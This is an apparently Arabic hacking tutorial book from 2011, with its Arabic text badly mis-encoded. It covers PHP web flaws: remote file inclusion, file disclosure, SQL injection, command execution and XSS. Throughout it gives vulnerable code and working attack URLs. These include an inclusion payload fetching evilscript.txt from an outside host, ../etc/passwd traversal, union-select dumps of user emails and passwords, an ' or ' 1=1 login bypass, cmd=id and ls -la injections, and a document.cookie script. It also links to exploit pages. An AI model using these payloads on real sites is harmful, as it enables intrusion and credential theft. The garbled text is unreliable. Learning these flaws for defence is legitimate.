Professional Documents
Culture Documents
كتاب عالم الثغرات
كتاب عالم الثغرات
tk
ا
ا ا
(Adel SBM)
www.the-code.tk
:اهاء
Bek4ever-ahmed.bak-THe Don :أهي ها ا
ا ا ا اا
:*+ ,- وا آ
:*ت:;-
http://www.noor7.com/
http://www.4algeria.com/vb
http://www.sa-hacker.com/vb/
http://www.gaza-hacker.com/cc
NاJ.ا
2011/10/23
http://www.the-code.tk
:سFPا
>1DG1 (
F;R3 2دوات اT( ا1
:(D$7, #/1 ء أو ادراجD )اRemote File Inclusion ةV (2
2ل أ1 -- 1-2
مDG1 ل1 -- 2-2
-$H> ا$P$ آ-- 3-2
:(2/R1 #/1 6$)R&/اءةH/# )آLocal File Disclosure/Download ةV (3
2ل أ1 -- 1-3
مDG1 ل1 -- 2-3
-$H> ا$P$ آ-- 3-3
:(ت3$l اDا5H (G') SQL Injection ةV (4
2ل أ1 -- 1-4
مDG1 ل1 -- 2-4
(ل5pD ا6$.+& وز.& ) SQL Injection Login Bypass-- 3-4
-$H> ا$P$ آ-- 4-4
:(1واT ا8$Pv&) Remote Command Execution ةV (5
2ل أ1 -- 1-5
مDG1 ل1 -- 2-5
-$H> ا$P$ آ-- 3-5
:(JAVA SCRIPT أوHTML اد5( أآG') Cross-Site Scripting ةV (6
2ل أ1 -- 1-6
-$H> ا$P$ آ-- 2-6
(ت3$l اDا5H )> وF)ت اP/)اءة اH و6$)R&) Download Backups+ INC files ةV (7
>/1أ+ ح-- 1-7
-$H> ا$P$ آ-- 2-7
:(>
)R ا-Hا51 (1) ل اات5' >/1( أ8
>)&p (
http://www.the-code.tk
:>1DG1
آ$ا > ( -)+3 1ا PHP >.1lو أ53اع اات ا) >/)Rو ا (1 vv?)& 2اpاق ا)H5ـ-
ا)ب.
و' 2B ?P3 ($ه8ا ا).ـل ')ـ 3ـ 6إـ?B Iـة أن اـة )F1ـ آـن F53ـ أو F.1,ـB.ـن
اآ FBه 5أ 7 1و ,ا...D$G7
2B -ا? (1 $ا)ات و أ 3أ&51 Pا -Hا?Fـ أ;ـ Dأن هvـك ا?$ـ 1ـ( ا)AـB ($ـ 2هـ8ا
ا).ل ?R
#ون ا)15/7ـت pـ> )$Bـ
/7ـ ,ـات ال lB PHPـ
?Pـ5ن ,ـح
ال و
.ه5/ن ح
>Gاآف.
إذن (1ان DBا & D.v+أو & /ا)D+ة (1أ' #?& 2? Dو & 6+اات.
ف7
1 M$l& أيMySQL وPHP D
13, M$l& 5 هIوTة ا5A ا8 ه2B v1 ب5/)ا
.3JF; I/ LOCALHOST (2/R)دم اA )ا2/R) اB+,
تD7 ا7, ا;اء.
M$l اD7, ، ا)ل6$l I/ APPSERVE أوWAMP 13, M$l& v?)
Iج اR& ات/ن أT php.ini (
5? ا#/1 6
D7, وذ2/R)دم اA اI/ >$+lا
.$R ا6?, FG$l وط
: 2/ )ن آ5?& $R, FD وphp.ini #/1 2B >$ت ا15/7) ( اR,ا
safe_mode = off
register_globals = on
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
short_tag_open = on
display_errors = on
disabled_functions = N/A
ال1ا, #/A1 6lH (1 F1اDA ت3$, ةDH ء3 إ، أو: >$&ات ا5Aع اl& ا.
6
D7 اD7,
. ت,?+, ف7
1 أوPHP
.P)ا> ا5, رهlp, H و-اده5ره –أآD1 > درا2B ءD,> و اP/A1 ت,? MlV ، $3V
!!!ل اات5' ¦$ أف3أ... ت؟,?+ ا8 درا> ه2vv?)
#$ آ: 6N+& انM3 أ-
.Fا..D$ اآف اات و أآI ا/v3 $ ه/G& ل5Hأ
http://www.the-code.tk
ن ت أو5?& 1 l 2> وا$;رp تP/1 ءD( ا1 v?)& F3 أ$R, اD; 4 اة وا8دور ه
.;F)/ >l+v, اقpت ا,?
.F$( ا$.1l)( اP درة وذ3 $' Fv? اات وp( ا1 l7& F3 آ) أ-
: 2ث اة وهDR& DH 2 و ا#/)ء اD> ا$/) ;& أنFv?) ث دوالV D;5& PHP > ال2B
require – require()
require_once
include
include_once
<?php
$pagina=$_GET['pagina'];
include $pagina;
?>
ن5?
)N داPHP > 2B $) و ا$pagina $) ا2D+& include >اDا. رp, د5?ح اv
(PHP ت$ أ7, I ا-;& أن2p أو أ$/) $ ورD اJ1, H5l+1
.include >اD/ >l+v, B71 $ أو5F.1 الJ
$pagina $) أن ا5 ه%A اl-
اقp اM,? أو6/ ,ن را5?& 2( و اR3 دهDR3 >)$H $) ا273 1Dv ن5?
وال
:6?ا ا8F, وP)ا> ا5, ا8ن ه5?
و
http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt?
-4 وF)( ا1
و أTXT 23 #/1 >$, ن5?
أن.
ءDي & ا8 ا6 أن اI+v&
. ¡,
> ااF3 2B مFP> ا1
<?php
$pagina=$_GET['pagina'];
include $pagina.'.php';
?>
http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt
تB4ز و ا51 ا6ه.&
2? ¡ ال, راD7, م ؟FP> ا1 أو00 ٪ #$3 ف5 8
.6 اF±$¡ او ادراج و,> ا$/) .v 2, وID+) ا$) اD7, ن5?& 2ا
if (isset($_REQUEST["main_content"])){
$main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
$main_content = $_SESSION["main_content"];
}
.......................etc..................
ob_start();
require_once($main_content);
>)$H أي/$ 15) ;F)" و اmain_content" $)ا> ا5, 6 ا2D+3 أنvv?)
REQUEST / دا> ا6P, $)/ دهDR
6G3 ل5آ5&و, " أوHTTPS" امDAب ا.3 "
)?( أنHTTP" 6lG& ص5v ا7, :>±'1
"FTP"تP/)ا
http://www.the-code.tk
.ات$) ا2B "/" 61 ت17ز و ا51ام اDA, )+& - : >$+, ق
.>B71 ات$) ا6 آ67.& ء و 'ول أنpT ( اR,ا-
.F/$)R& I' و، فDF+) ا-H5)ت اP/1 ى5R1 اءةH v?) اة8ل هp (1 ª3B >+, 6?,
<?php
$pagina=$_GET['pagina'];
readfile($pagina);
?>
$pagina $), دDR) ا#/)ى ا5R1 اءةH readfile >اDول اR . رp, د5?ح اv
ولR$ لR> ا7$l, قA) و اª&اءH ا)اد#/)ر ا+1 D
DR, م5Gv ال2B 2,و
تDv) >l+v, config.php #/1 61 اقpت ا15/71 ي5R& 2)> و اF)ت اP/)اءة اH
: vBulletin
http://127.0.0.1/test.php?pagina=../../../../../etc/passwd
..رجA( ا1 ءD· ا$ اءة وG/ #/) ا/ $ 2,و
. M,?+ت ا35?1 +' $
وª&اءH ا)اد#/)ر ا+1 2 ه../../../../../etc/passwdو
http://www.the-code.tk
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
2B F±
ي8 ا.$ _REQUEST >ا5, ªl/ &( و1 ا$ 5ب وه5/) ا#/) ( اl7
$file $)ا
.ولT ا+ا
.#/)ى ا5R1 ى3 أنvv?)
readfile () >اDو (
ا
: 2ن آ5?
ال2, و
http://127.0.0.1/download.php?file=../../../../../../etc/passwd
.ات$) ا2B "/" 61 ت17ز و ا51ام اDA, )+& - : >$+, ق
.>B71 ات$) ا6 آ67.& ء و 'ول أنpT ( اR,ا-
.
http://www.the-code.tk
FT اF3> ال آ) أ$'3 (1 7T اl7& را و3آ اT ا2 هSQL Injection ةV ان
اولD. اD
DR& (1 >
اD, F& ا2B $HD> و اHD, F' , آR+& هD'5 اة8ه
-B( ر1 v?)& 2> و ا1DG) ا6' ا)اV (1 ت و3$lاج اA اI ا5> و,)ة اD)Tوا
.6ا
<?php
$id = $_GET['id'];
$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>
هD
3 2 اSQL 1( أواGR3
)?( أنv3 أ2v7
ا8 ه/P1 $ $id $)ن اB «'3 )آ
؟/P1 $, DHي أ81 6N+& DH
1H· أر$> وP/A1 ز51 ورSQL 1ن أوا5?
)?( أنªvGR3 ي8د ا5? أن ا2ة و ه/P( ا1 /P1 $-
.ت3$lة اDG ª;5& 1 أوا6)& ورهD, ز51 ا8¡ وهGB
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near 'ORDER BY `date` DESC' at line 1
http://127.0.0.1/test.php?id=1+union+all+select+1,2,version(),4--
.(3 Hد ر5)7 ا2B >,ت )ا3$lة اDH ارD اI/ 6Rv vوه
http://www.the-code.tk
$id = $_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals
where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
. ة/P1 $ Fl/v 2)> ا$G واitemnr /ا> ا5, $id $))> ا$H D,DR& $ ª3'« أ3
: 2&T> و ذ آ5F 6?, SQL ( الG' (1 (?)v 2,و
http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,
3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--
6)) ا6$P, F' ان أن أ2vv?)
ا8 ااتDG( أ1 2 هSQL Injection :>1> ه±'1
ة/P ا2A& (1 ال6$P& 6 آ6)$ اة و8ل ه5' 1 آ,ر آD% *و ان ء ا
.6 ا-B رI ا5ت و15/7)اج اA اIا
SQL ةV (1 ءJ. آFPv 8 F+l اات و ذ6); و أ#p( أ1 l7& اة8ه
' or ' 1=1 J1) ا7+1 '> ادارة5 Iل ا5pD( ا1 v?)& 2 وهInjection
: ا)لI/ Jرآ
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND
password = '$postpass'")
or die("<p>" . mysql_error() . "</p>\n");
http://www.the-code.tk
>؟+l ا8F, SQL عDAv 6 ؟ وهv5p د6.+$ #$ل آ5Gv v3 أD$أآ
: l+ف ا7v SQL ( ف ال1 l$ ي8 ا1T اv±' 5 v3T 73 2> ه,;ا
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND
password = ' jocker'")
ي8 ا1T( &;)> ا1 (?)& 2? ت3$l اDا5H -1 617> اG
( ?ةB
D ن5?& أن.
-
.فDFن ا ا5?
أن.
ل5pD أن ا ا/7 ا-1 ل5pD( ا1 v?)& وSQL الª, vDp
:ا آ)ل8 ه1ام اDA, 1H¡ أرGB F/7;ات و ا$) ا2B وفR/ )+& -
$id=(int)$_GET['id'];
-,.()'"_+/*
: 2 وه1واT ا$l, )+& 2وال اD ا7, D;5& PHP > ال2B-
exec
passthru
shell_exec
system
>.$3 ةDه1 v?)
ª3B EXEC() >اD, 1واT ا$l& l
إذا آن ال: >±'1 --
.-l& F3( اذ أ1واT ا8$Pv&
(? )و1واTا
http://www.the-code.tk
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
$cmd >R ا8 ه2B 5 وه$)/ >)$H / vv?) #$ آvB >G,+ل درا> اات اp (1
http://127.0.0.1/test.php?cmd=id
.>.$v اF±& ف5( وB+ اI/ v&$' ض1 )أid 1T ا8$Pv& $و
اض7 )اdir 1Tوز آDv
5م ا±3 1( أوا1 1Tن ا5?$ 2/R) اB+ اI/
. '> ا2Bو
.(2R اD/.)ت اP/1
$ns = $_GET['ns'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
........................ etc ........................
$host = strtolower($host);
echo("<span class=\"plainBlue\"><b>Executing : <u>dig $ns </u></b><br>");
echo '<pre>';
system ("$ns");
$ns $)ل اp (1 D 1 أي أª;5 ; أنF)/ (?) ª3 أF± vه
http://127.0.0.1/dig.php?ns=ls -la
$dz = $_GET['ns'];
$alg = $_GET['alg]; .
........................ etc ........................
system ("dig @$dz $alg");
?>
ن ال؟5?$ #$ رأ
آ2B
l أآ2B هD.& ا و
)?( أنD; ةv1 2FB ا8F وF35v
اة أو8ن ه5.1l) ا6ه.
1 ا$آ
.>$> ذآG
, F اI/ ;F)رة اDH 2B ()?& F$7B (? >$)7 ا-Hا5)ا
<?php
$name=$_GET['name'];
print $name;
?>
print >اDا> ا5, ªl V (1 و$name $)/ >)$H / ª3B د5? اv);& 5
:6?ا ا8F, M,? B; د5( آGR3 5 رأ1 ....... د5?ا ا8> ل هG 2B اD$; ?Pv -
http://127.0.0.1/test.php?name=<script>alert(document.cookie)</script>
8 ه2B v, صA اJ$آ5? ا5م و هDA+) اJ$آ5ي آ5R& B; >ة ر8B3 ر5F¹ ن5? >.$vا
.>Rا
http://www.the-code.tk
رp أو ا$P& V J$آ5?اج اAد ا5ي آ5R
¡,
( را5?& >$/) l & اقp ق اD' ا-
I ا6 ª, >A اJ$آ5?ت ا15/71 نB ¡,ا/ >$R اP& Dv . >$R اI اªوار
.>Hو+) اJ$آ5?ت ا15/71 +1 >$Rب ا+' Iل ا5pD, م5G
$pTا ا8; و هF)ا
htmlspecialchars()
أو داhtmlentities() >)ل دا7 اvv?)
$' اD; >/F -$H> اG
php?>
;(['name=htmlentities($_GET['name$
;print $name
<?
-H5)ت ا3$, ةDG >$$' اº+v ا6$)R, )+& : Download Backups ةV
.فDF+)ا
:¡$+, ل1
http://127.0.0.1/adminpanel/phpmydump.php
( ا))?( أن1 > وB5?1 ن5?& 2 واinc تP/1 7, اءةG, )+& و: INC files ةV
.فDF+) ا-H5)ت ا15/71 ي5R&
http://127.0.0.1/inc/mysql.inc
6
5R> و ا ا$$'> اA+v ا6$)R& D
ي8 ا5
هD)( أن ا1 GR ا: Download Backups
.>$$' اº+v)
> اR ري3 ارD; امDA – ا%p >RP Iا
>$, تP/1 2B ت15/7)« اP' 5 ه6BT وا.htaccess امDA, تP/) ')
> ا: INC files
.PHP
http://www.1337day.com/exploits/14932
http://www.1337day.com/exploits/17087
http://www.1337day.com/exploits/17021
http://www.1337day.com/exploits/14836
http://www.1337day.com/exploits/14828
http://www.1337day.com/exploits/1503
http://www.1337day.com/exploits/17073
http://www.the-code.tk
:>)&p
ا8 ه6> ال و?( آ$P$رة و آ5A ا$' (1 #/A& ( اات1 اع53ة أD D;5& ª3وف أ7)( ا1
ª3 أD( ا)»آ1 اات وI أآ ا,H أن أM 'وDG 2pأ, ªN; و ذآF)رة اDH I/ D)7
I/ ءp أ2v1 ان وردت23رو8و ا...( ا'اف1 >1DG1 >/'1 I اM/) و/ت أآ آDF;) ا/آ
...6; وJ * ?)لB ى اح5+1 I/ أو2N1ي أو ا5Rvى ا5+)ا
Madrido.Jocker@gmail.com
http://www.the-code.tk
AdelَSBM
http://www.the-code.tk
2011/10/23
http://www.the-code.tk
Z^] \[ ا